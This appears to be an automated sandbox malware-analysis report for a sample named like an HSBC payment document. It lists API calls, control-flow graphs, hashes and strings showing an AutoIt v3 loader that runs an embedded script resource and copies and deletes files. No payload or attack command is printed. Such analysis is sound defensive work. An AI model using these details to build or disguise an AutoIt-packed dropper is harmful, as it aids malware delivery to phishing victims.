                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1986165174-0
                                                                                                                                • Opcode ID: 9cd2123e35244b6c3c40011b71bfe8d85f0df982b5ecd84166f02a0cb5b86c6a
                                                                                                                                • Instruction ID: 81ec18d21dc61774274221fd3356f877e97795039c2d7c00619342e6a17d2e76
                                                                                                                                • Opcode Fuzzy Hash: 9cd2123e35244b6c3c40011b71bfe8d85f0df982b5ecd84166f02a0cb5b86c6a
                                                                                                                                • Instruction Fuzzy Hash: 6991C3319897D0DEC731CB7899501AABFF5AF2A301B448DAED0CB93A41D268B90CC75D

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1106 724e89-724ea1 CreateStreamOnHGlobal 1107 724ea3-724eba FindResourceExW 1106->1107 1108 724ec1-724ec6 1106->1108 1109 724ec0 1107->1109 1110 75d933-75d942 LoadResource 1107->1110 1109->1108 1110->1109 1111 75d948-75d956 SizeofResource 1110->1111 1111->1109 1112 75d95c-75d967 LockResource 1111->1112 1112->1109 1113 75d96d-75d98b 1112->1113 1113->1109
                                                                                                                                APIs
                                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00724D8E,?,?,00000000,00000000), ref: 00724E99
                                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00724D8E,?,?,00000000,00000000), ref: 00724EB0
                                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,00724D8E,?,?,00000000,00000000,?,?,?,?,?,?,00724E2F), ref: 0075D937
                                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,00724D8E,?,?,00000000,00000000,?,?,?,?,?,?,00724E2F), ref: 0075D94C
                                                                                                                                • LockResource.KERNEL32(00724D8E,?,?,00724D8E,?,?,00000000,00000000,?,?,?,?,?,?,00724E2F,00000000), ref: 0075D95F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                • String ID: SCRIPT
                                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                                • Opcode ID: de71a33e8c1634b3a33f40619980224692aac90ab0cb993d0da395685227b88d
                                                                                                                                • Instruction ID: 3863c95184892e18c733abffd6c6401f735c11e07670f8d33ae73945a7cf2990
                                                                                                                                • Opcode Fuzzy Hash: de71a33e8c1634b3a33f40619980224692aac90ab0cb993d0da395685227b88d
                                                                                                                                • Instruction Fuzzy Hash: 01115E75640700BFE7318BA5EC48F677BBAFBC6B11F108268F405C6290DB65EC008A60
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Dd~$Dd~$Dd~$Dd~$Variable must be of type 'Object'.
                                                                                                                                • API String ID: 0-4039284102
                                                                                                                                • Opcode ID: 22b38bdb3146a3af931bd8b5b1576460a595663dfbd18685d01e58e3ddd86fc5
                                                                                                                                • Instruction ID: b28f584376fc6b065953d1a1a1c0b37c38555728ee90c09cb9441b7ea3c115fb
                                                                                                                                • Opcode Fuzzy Hash: 22b38bdb3146a3af931bd8b5b1576460a595663dfbd18685d01e58e3ddd86fc5
                                                                                                                                • Instruction Fuzzy Hash: 01A29075A00225CFCF24CF54E484AAEB7B2FF59310F648069E946AB351D739ED82CB91
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(?,0075E398), ref: 0078446A
                                                                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 0078447B
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0078448B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 48322524-0
                                                                                                                                • Opcode ID: 220ac3b1b88d8e86f35318d358b0b37582d175fae68993b37e001d84f9bb503b
                                                                                                                                • Instruction ID: 3a7a88063e024cdf1b8facde731bc3257ece976205129b0125b6c7690aed0d1a
                                                                                                                                • Opcode Fuzzy Hash: 220ac3b1b88d8e86f35318d358b0b37582d175fae68993b37e001d84f9bb503b
                                                                                                                                • Instruction Fuzzy Hash: 7FE0D8324105416742107B78EC0D9ED7B9CAE46335F104715F839C10E0E7FC5D009699
                                                                                                                                APIs
                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00730A5B
                                                                                                                                • timeGetTime.WINMM ref: 00730D16
                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00730E53
                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00730E61
                                                                                                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 00730EFA
                                                                                                                                • DestroyWindow.USER32 ref: 00730F06
                                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00730F20
                                                                                                                                • Sleep.KERNEL32(0000000A,?,?), ref: 00764E83
                                                                                                                                • TranslateMessage.USER32(?), ref: 00765C60
                                                                                                                                • DispatchMessageW.USER32(?), ref: 00765C6E
                                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00765C82
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb~$pb~$pb~$pb~
                                                                                                                                • API String ID: 4212290369-878677322
                                                                                                                                • Opcode ID: 95a561f43de689386c22c86679318b9cece77190383724ee15cb4ab27463d385
                                                                                                                                • Instruction ID: 9cf2049ce99887793043cccaf6549189d32593f85c389f7652746634db4723cf
                                                                                                                                • Opcode Fuzzy Hash: 95a561f43de689386c22c86679318b9cece77190383724ee15cb4ab27463d385
                                                                                                                                • Instruction Fuzzy Hash: CAB2E870608741DFD724DF24C898BAAB7E4BF85304F14891DF98A97292CB7DE844DB92

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00788F5F: __time64.LIBCMT ref: 00788F69
                                                                                                                                  • Part of subcall function 00724EE5: _fseek.LIBCMT ref: 00724EFD
                                                                                                                                • __wsplitpath.LIBCMT ref: 00789234
                                                                                                                                  • Part of subcall function 007440FB: __wsplitpath_helper.LIBCMT ref: 0074413B
                                                                                                                                • _wcscpy.LIBCMT ref: 00789247
                                                                                                                                • _wcscat.LIBCMT ref: 0078925A
                                                                                                                                • __wsplitpath.LIBCMT ref: 0078927F
                                                                                                                                • _wcscat.LIBCMT ref: 00789295
                                                                                                                                • _wcscat.LIBCMT ref: 007892A8
                                                                                                                                  • Part of subcall function 00788FA5: _memmove.LIBCMT ref: 00788FDE
                                                                                                                                  • Part of subcall function 00788FA5: _memmove.LIBCMT ref: 00788FED
                                                                                                                                • _wcscmp.LIBCMT ref: 007891EF
                                                                                                                                  • Part of subcall function 00789734: _wcscmp.LIBCMT ref: 00789824
                                                                                                                                  • Part of subcall function 00789734: _wcscmp.LIBCMT ref: 00789837
                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00789452
                                                                                                                                • _wcsncpy.LIBCMT ref: 007894C5
                                                                                                                                • DeleteFileW.KERNEL32(?,?), ref: 007894FB
                                                                                                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00789511
                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00789522
                                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00789534
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1500180987-0
                                                                                                                                • Opcode ID: dda93e91e6fa962985e4ad54b2173dc75b7ec74559ea27af85ad28a5f32716a9
                                                                                                                                • Instruction ID: 5e5046983d81d8edc89a42ddf57622ba22b7eb8b1558eb64bb22d3cc84bbf90b
                                                                                                                                • Opcode Fuzzy Hash: dda93e91e6fa962985e4ad54b2173dc75b7ec74559ea27af85ad28a5f32716a9
                                                                                                                                • Instruction Fuzzy Hash: 91C15DB1D40129AADF21EF95CC85AEEB7BCEF85310F0440A6F609E6141EB349A448F65

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00723074
                                                                                                                                • RegisterClassExW.USER32(00000030), ref: 0072309E
                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007230AF
                                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 007230CC
                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007230DC
                                                                                                                                • LoadIconW.USER32(000000A9), ref: 007230F2
                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00723101
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                                • Opcode ID: 150654a7ede0b153be26da6f2ae6f5da8f45e3d0951073121f08a06c05403d81
                                                                                                                                • Instruction ID: e1f74feeb0c73d1e0031be90233c1b92c527f0564f8d1489484de32817bd4d0c
                                                                                                                                • Opcode Fuzzy Hash: 150654a7ede0b153be26da6f2ae6f5da8f45e3d0951073121f08a06c05403d81
                                                                                                                                • Instruction Fuzzy Hash: FC3118B1901359EFDB508FE4EC89ADABBF4FB09314F14812AE540EA2A1D3B90541CF95

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00723074
                                                                                                                                • RegisterClassExW.USER32(00000030), ref: 0072309E
                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007230AF
                                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 007230CC
                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007230DC
                                                                                                                                • LoadIconW.USER32(000000A9), ref: 007230F2
                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00723101
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                                • Opcode ID: 769dd41365096c8f1beb0a0b8ce8c6510ee6bc2fbc46f1564a6ca1d2fa2e7162
                                                                                                                                • Instruction ID: 1f566a5d593e0d86c2ccd7818439e1a261aec4ba69f3836fdc003c1b77da40f6
                                                                                                                                • Opcode Fuzzy Hash: 769dd41365096c8f1beb0a0b8ce8c6510ee6bc2fbc46f1564a6ca1d2fa2e7162
                                                                                                                                • Instruction Fuzzy Hash: 0821C8B1901658AFDB10DFD4EC89B9EBBF4FB0D704F00812AF610AA2A0D7B945448F99

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00724706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007E52F8,?,007237AE,?), ref: 00724724
                                                                                                                                  • Part of subcall function 0074050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00727165), ref: 0074052D
                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007271A8
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0075E8C8
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0075E909
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0075E947
                                                                                                                                • _wcscat.LIBCMT ref: 0075E9A0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                • API String ID: 2673923337-2727554177
                                                                                                                                • Opcode ID: 4cabf1fe85cbd57065dad95ba272d417fb4cbd2d419ad2be4dddc7805e228522
                                                                                                                                • Instruction ID: 66896688bbfd22b3f6bbc8a83f005ca6d84e02ecae42917a619adccd6cec2163
                                                                                                                                • Opcode Fuzzy Hash: 4cabf1fe85cbd57065dad95ba272d417fb4cbd2d419ad2be4dddc7805e228522
                                                                                                                                • Instruction Fuzzy Hash: 8A71CF71509351DEC304EF25EC859ABBBECFF99350B40852EF544CB1A0EB78A948CB96

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 762 723633-723681 764 723683-723686 762->764 765 7236e1-7236e3 762->765 767 7236e7 764->767 768 723688-72368f 764->768 765->764 766 7236e5 765->766 769 7236ca-7236d2 DefWindowProcW 766->769 770 75d0cc-75d0fa call 731070 call 731093 767->770 771 7236ed-7236f0 767->771 772 723695-72369a 768->772 773 72374b-723753 PostQuitMessage 768->773 775 7236d8-7236de 769->775 805 75d0ff-75d106 770->805 776 7236f2-7236f3 771->776 777 723715-72373c SetTimer RegisterWindowMessageW 771->777 779 75d154-75d168 call 782527 772->779 780 7236a0-7236a2 772->780 774 723711-723713 773->774 774->775 782 75d06f-75d072 776->782 783 7236f9-72370c KillTimer call 72443a call 723114 776->783 777->774 785 72373e-723749 CreatePopupMenu 777->785 779->774 799 75d16e 779->799 786 723755-723764 call 7244a0 780->786 787 7236a8-7236ad 780->787 792 75d074-75d076 782->792 793 75d0a8-75d0c7 MoveWindow 782->793 783->774 785->774 786->774 788 7236b3-7236b8 787->788 789 75d139-75d140 787->789 797 75d124-75d134 call 782d36 788->797 798 7236be-7236c4 788->798 789->769 804 75d146-75d14f call 777c36 789->804 801 75d097-75d0a3 SetFocus 792->801 802 75d078-75d07b 792->802 793->774 797->774 798->769 798->805 799->769 801->774 802->798 806 75d081-75d092 call 731070 802->806 804->769 805->769 810 75d10c-75d11f call 72443a call 72434a 805->810 806->774 810->769
                                                                                                                                APIs
                                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 007236D2
                                                                                                                                • KillTimer.USER32(?,00000001), ref: 007236FC
                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0072371F
                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0072372A
                                                                                                                                • CreatePopupMenu.USER32 ref: 0072373E
                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 0072374D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                • String ID: TaskbarCreated$%{
                                                                                                                                • API String ID: 129472671-2414581122
                                                                                                                                • Opcode ID: 7542c2a235c453c1ae6655165242a47f64299c1a706fb150bcd949db7ad2629e
                                                                                                                                • Instruction ID: d39549d78c7d860aecdd890be41879acf28634995c9c045241433cc3fdb37856
                                                                                                                                • Opcode Fuzzy Hash: 7542c2a235c453c1ae6655165242a47f64299c1a706fb150bcd949db7ad2629e
                                                                                                                                • Instruction Fuzzy Hash: 86419AB120059DFBDF246F68FC8DBB9375CEB09300F504125FA06CA2A2CA6D9E058329

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00723A50
                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00723A5F
                                                                                                                                • LoadIconW.USER32(00000063), ref: 00723A76
                                                                                                                                • LoadIconW.USER32(000000A4), ref: 00723A88
                                                                                                                                • LoadIconW.USER32(000000A2), ref: 00723A9A
                                                                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00723AC0
                                                                                                                                • RegisterClassExW.USER32(?), ref: 00723B16
                                                                                                                                  • Part of subcall function 00723041: GetSysColorBrush.USER32(0000000F), ref: 00723074
                                                                                                                                  • Part of subcall function 00723041: RegisterClassExW.USER32(00000030), ref: 0072309E
                                                                                                                                  • Part of subcall function 00723041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007230AF
                                                                                                                                  • Part of subcall function 00723041: InitCommonControlsEx.COMCTL32(?), ref: 007230CC
                                                                                                                                  • Part of subcall function 00723041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007230DC
                                                                                                                                  • Part of subcall function 00723041: LoadIconW.USER32(000000A9), ref: 007230F2
                                                                                                                                  • Part of subcall function 00723041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00723101
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                                • Opcode ID: a9002fae4f16c112ef4c64a6f23d2ff44461e31f2e37a98427a8e3ebe1e5ef7a
                                                                                                                                • Instruction ID: 87d3ae534d90c24e719f6d109ef698557f93f4c0f461ce9a8b7fc4b3ca1d673c
                                                                                                                                • Opcode Fuzzy Hash: a9002fae4f16c112ef4c64a6f23d2ff44461e31f2e37a98427a8e3ebe1e5ef7a
                                                                                                                                • Instruction Fuzzy Hash: 97214FB1D01358AFEB10DFA4EC89B9D7BB9FB4C715F008129F604AA2A1D3BD55408F98

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R~
                                                                                                                                • API String ID: 1825951767-576807863
                                                                                                                                • Opcode ID: 9e88ef77f9e82cc8ca9535b496b923d535504affe4f8efd4a23d90b535696db4
                                                                                                                                • Instruction ID: 1284636bfcb05e1f6ca53fbc0171f84fd20e014d369ce64183d941d11fa16f8b
                                                                                                                                • Opcode Fuzzy Hash: 9e88ef77f9e82cc8ca9535b496b923d535504affe4f8efd4a23d90b535696db4
